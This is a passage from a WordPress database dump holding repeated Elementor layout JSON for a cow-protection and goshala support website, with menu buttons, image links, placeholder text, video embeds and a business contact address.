d_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9428,1605,'_elementor_page_assets','a:0:{}'),(9430,1606,'_elementor_edit_mode','builder'),(9431,1606,'_elementor_template_type','wp-page'),(9432,1606,'_elementor_version','3.7.8'),(9433,1606,'_wp_page_template','elementor_canvas'),(9434,1606,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9435,1606,'_elementor_page_assets','a:0:{}'),(9437,1607,'_elementor_edit_mode','builder'),(9438,1607,'_elementor_template_type','wp-page'),(9439,1607,'_elementor_version','3.7.8'),(9440,1607,'_wp_page_template','elementor_canvas'),(9441,1607,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/